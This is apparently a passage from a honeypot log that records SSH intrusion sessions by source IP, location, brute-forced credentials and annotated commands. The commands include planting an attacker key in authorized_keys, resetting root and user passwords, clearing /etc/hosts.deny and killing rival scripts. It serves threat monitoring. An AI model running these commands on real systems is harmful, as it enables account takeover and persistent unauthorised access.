$ Enter new UNIX password: Γ—8
$ echo "khan\nUjPy54H1Jpok\nUjPy54H1Jpok\n"|passwd
$ echo -e "12345\nqN0WqRJzweZ3\nqN0WqRJzweZ3"|passwd|bash
$ echo "12345\nqN0WqRJzweZ3\nqN0WqRJzweZ3\n"|passwd
$ echo -e "12345\nzFtDJ9AlaJlb\nzFtDJ9AlaJlb"|passwd|bash
$ echo "12345\nzFtDJ9AlaJlb\nzFtDJ9AlaJlb\n"|passwd
$ echo -e "12345\nceoM1NKqjzYk\nceoM1NKqjzYk"|passwd|bash
$ echo "12345\nceoM1NKqjzYk\nceoM1NKqjzYk\n"|passwd
$ echo -e "12345\nNMyqaw11fljO\nNMyqaw11fljO"|passwd|bash
$ echo "12345\nNMyqaw11fljO\nNMyqaw11fljO\n"|passwd
$ echo -e "12345\nuw3Mo5tmLOyZ\nuw3Mo5tmLOyZ"|passwd|bash
$ echo "12345\nuw3Mo5tmLOyZ\nuw3Mo5tmLOyZ\n"|passwd
$ echo -e "12345\nusCm27TNKMnt\nusCm27TNKMnt"|passwd|bash
$ echo "12345\nusCm27TNKMnt\nusCm27TNKMnt\n"|passwd
$ echo -e "12345\nUCyh1XObn67g\nUCyh1XObn67g"|passwd|bash
$ echo "12345\nUCyh1XObn67g\nUCyh1XObn67g\n"|passwd
🎭 ghost_root_62 (178.128.51.84) β€” Singapore, Singapore Β· 2 sessions Β· 38 cmds
2026-05-30 04:49 EDT Β· as root/123456tr, root/1998
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—2 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—2 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—2 // CPU profiling
$ echo "root:3N4krm1wCFSd"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; Γ—2 // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—2 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—2
$ ls -lh $(which ls) Γ—2
$ which ls Γ—2
$ crontab -l Γ—2 // persistence setup
$ w Γ—2 // logged-in users check
$ uname -m Γ—2
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—2 // CPU profiling
$ top Γ—2 // process monitoring
$ uname Γ—2 // OS identification
$ uname -a Γ—2 // OS/kernel identification
$ whoami Γ—2 // privilege check
$ lscpu | grep Model Γ—2
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—2
$ echo "root:rJXE7nZ5TlRp"|chpasswd|bash
🎭 spice_root_5 (103.190.7.203) β€” Rajkot, India Β· 5 sessions Β· 97 cmds
2026-05-18 01:48 EDT Β· as admin2/123, gitlab-runner/gitlab-runner, root/4rfv5tgb
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—5 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—5 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—5 // CPU profiling
$ echo -e "gitlab-runner\nRqtRrOWtYkNc\nRqtRrOWtYkNc"|passwd|bash
$ Enter new UNIX password: Γ—2
$ echo "gitlab-runner\nRqtRrOWtYkNc\nRqtRrOWtYkNc\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—5 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—5
$ ls -lh $(which ls) Γ—5
$ which ls Γ—5
$ crontab -l Γ—5 // persistence setup
$ w Γ—5 // logged-in users check
$ uname -m Γ—5
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—5 // CPU profiling
$ top Γ—5 // process monitoring
$ uname Γ—5 // OS identification
$ uname -a Γ—5 // OS/kernel identification
$ whoami Γ—5 // privilege check
$ lscpu | grep Model Γ—5
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—5
$ echo -e "123\nmGvOVfbmBKre\nmGvOVfbmBKre"|passwd|bash
$ echo "123\nmGvOVfbmBKre\nmGvOVfbmBKre\n"|passwd
$ echo "root:5f4ZjY9SYqW1"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; Γ—3 // execute from /tmp
$ echo "root:fq7hBp7uxixs"|chpasswd|bash
$ echo "root:WV4UZYICdRwJ"|chpasswd|bash
🎭 stein_root_16 (152.70.18.38) β€” Frankfurt am Main, Germany Β· 2 sessions Β· 40 cmds
2026-05-30 03:47 EDT Β· as gitlab-runner/gitlab-runner, user/123123
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—2 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—2 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—2 // CPU profiling
$ echo -e "123123\ng75A1Wr5qoT6\ng75A1Wr5qoT6"|passwd|bash
$ Enter new UNIX password: Γ—2
$ echo "123123\ng75A1Wr5qoT6\ng75A1Wr5qoT6\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—2 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—2
$ ls -lh $(which ls) Γ—2
$ which ls Γ—2
$ crontab -l Γ—2 // persistence setup
$ w Γ—2 // logged-in users check
$ uname -m Γ—2
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—2 // CPU profiling
$ top Γ—2 // process monitoring
$ uname Γ—2 // OS identification
$ uname -a Γ—2 // OS/kernel identification
$ whoami Γ—2 // privilege check
$ lscpu | grep Model Γ—2
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—2
$ echo -e "gitlab-runner\nu64Q2E0h2wiB\nu64Q2E0h2wiB"|passwd|bash
$ echo "gitlab-runner\nu64Q2E0h2wiB\nu64Q2E0h2wiB\n"|passwd
🎭 rogue_root_51 (190.156.133.239) β€” MedellΓ­n, Colombia Β· 1 session Β· 20 cmds
2026-05-30 03:50 EDT Β· as user/123123
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "123123\nPnVfSysH67If\nPnVfSysH67If"|passwd|bash
$ Enter new UNIX password:
$ echo "123123\nPnVfSysH67If\nPnVfSysH67If\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 phantom_root_45 (185.28.216.2) β€” BogotΓ‘, Colombia Β· 1 session Β· 20 cmds
2026-05-30 03:43 EDT Β· as admin2/123
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "123\nurTXRUaFJPhh\nurTXRUaFJPhh"|passwd|bash
$ Enter new UNIX password:
$ echo "123\nurTXRUaFJPhh\nurTXRUaFJPhh\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 specter_root_52 (168.167.228.74) β€” Gaborone, Botswana Β· 3 sessions Β· 59 cmds
2026-05-20 06:38 EDT Β· as root/Password.123, service/1234, tmp/1
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—3 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—3 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—3 // CPU profiling
$ echo -e "1\ngyEh9tWLtlhp\ngyEh9tWLtlhp"|passwd|bash
$ Enter new UNIX password: Γ—2
$ echo "1\ngyEh9tWLtlhp\ngyEh9tWLtlhp\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—3 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—3
$ ls -lh $(which ls) Γ—3
$ which ls Γ—3
$ crontab -l Γ—3 // persistence setup
$ w Γ—3 // logged-in users check
$ uname -m Γ—3
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—3 // CPU profiling
$ top Γ—3 // process monitoring
$ uname Γ—3 // OS identification
$ uname -a Γ—3 // OS/kernel identification
$ whoami Γ—3 // privilege check
$ lscpu | grep Model Γ—3
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—3
$ echo "root:BJZZCcoc76D9"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ echo -e "1234\n26SgJqiPrEZz\n26SgJqiPrEZz"|passwd|bash
$ echo "1234\n26SgJqiPrEZz\n26SgJqiPrEZz\n"|passwd
🎭 phantom_root_46 (141.98.233.84) β€” Brussels, Belgium Β· 1 session Β· 20 cmds
2026-05-29 22:53 EDT Β· as tmp/1
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo -e "1\n9KOKRSlSjggR\n9KOKRSlSjggR"|passwd|bash
$ Enter new UNIX password:
$ echo "1\n9KOKRSlSjggR\n9KOKRSlSjggR\n"|passwd
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 ghost_root_63 (165.154.12.108) β€” Dubai, United Arab Emirates Β· 1 session Β· 19 cmds
2026-05-29 22:52 EDT Β· as root/qwerty123
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo "root:5XRQ9zKjkZqL"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 ramen_root_2 (133.242.172.237) β€” Chiyoda City, Japan Β· 2 sessions Β· 21 cmds
2026-05-25 06:40 EDT Β· as root/Kennwort1, ubuntu/Abcd1234
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—2 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—2 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo "root:lsFsf2FOp8pX"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 cipher_root_44 (151.242.191.232) β€” Bucharest, Romania Β· 4 sessions Β· 78 cmds
2026-05-27 10:17 EDT Β· as admin/fjbdfdjkdsfs541544, root/Kennwort1, root/root@123
Ran uname 1x across 1 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—4 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—4 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—4 // CPU profiling
$ echo "root:zDzp5OEO8ObU"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; Γ—2 // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—4 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—4
$ ls -lh $(which ls) Γ—4
$ which ls Γ—4
$ crontab -l Γ—4 // persistence setup
$ w Γ—4 // logged-in users check
$ uname -m Γ—4
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—4 // CPU profiling
$ top Γ—4 // process monitoring
$ uname Γ—4 // OS identification
$ uname -a Γ—4 // OS/kernel identification
$ whoami Γ—4 // privilege check
$ lscpu | grep Model Γ—4
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—4
$ echo -e "fjbdfdjkdsfs541544\nP9wmHr2zAIj8\nP9wmHr2zAIj8"|passwd|bash
$ Enter new UNIX password: Γ—2
$ echo "fjbdfdjkdsfs541544\nP9wmHr2zAIj8\nP9wmHr2zAIj8\n"|passwd
$ echo -e "Voidsetdownload.so\nMdtKxFAkfVJT\nMdtKxFAkfVJT"|passwd|bash
$ echo "Voidsetdownload.so\nMdtKxFAkfVJT\nMdtKxFAkfVJT\n"|passwd
$ echo "root:zIDKx0auGkwv"|chpasswd|bash
🎭 gouda_sol_7 (45.156.87.117) β€” Eygelshoven, Netherlands Β· 2 sessions Β· 2 cmds
2026-05-29 21:27 EDT Β· as root/Password123, user/user
Ran uname 2x across 2 sessions β€” automated OS fingerprinting.
$ uname -s -v -n -r -m Γ—2
🎭 strudel_root_7 (147.45.222.20) β€” Frankfurt am Main, Germany Β· 1 session Β· 19 cmds
2026-05-29 21:58 EDT Β· as root/Kennwort1
Ran uname 2x across 2 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l // CPU profiling
$ echo "root:HZCMCXYUIpVj"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l // persistence setup
$ w // logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l // CPU profiling
$ top // process monitoring
$ uname // OS identification
$ uname -a // OS/kernel identification
$ whoami // privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
🎭 wraith_root_47 (81.181.166.191) β€” TimiΘ™oara, Romania Β· 2 sessions Β· 39 cmds
2026-05-29 21:49 EDT Β· as deploy/deploy123, root/Qwer1234.
Ran uname 2x across 2 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh Γ—2 // file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~ Γ—2 // SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l Γ—2 // CPU profiling
$ echo "root:mL0TCcB2qIf2"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep; // execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}' Γ—2 // CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}' Γ—2
$ ls -lh $(which ls) Γ—2
$ which ls Γ—2
$ crontab -l Γ—2 // persistence setup
$ w Γ—2 // logged-in users check
$ uname -m Γ—2
$ cat /proc/cpuinfo | grep model | grep name | wc -l Γ—2 // CPU profiling
$ top Γ—2 // process monitoring
$ uname Γ—2 // OS identification
$ uname -a Γ—2 // OS/kernel identification
$ whoami Γ—2 // privilege check
$ lscpu | grep Model Γ—2
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}' Γ—2
$ echo -e "deploy123\nclsSwLM8ZUpE\nclsSwLM8ZUpE"|passwd|bash
$ Enter new UNIX password:
$ echo "deploy123\nclsSwLM8ZUpE\nclsSwLM8ZUpE\n"|passwd
🎭 phantom_root_47 (45.202.210.103) β€” Hong Kong, Hong Kong Β· 1 session Β· 19 cmds
2026-05-29 21:48 EDT Β· as root/Qwer1234.
Ran uname 2x across 2 sessions β€” automated OS fingerprinting.
$ cd ~; chattr -ia .ssh; lockr -ia .ssh // file attribute tampering
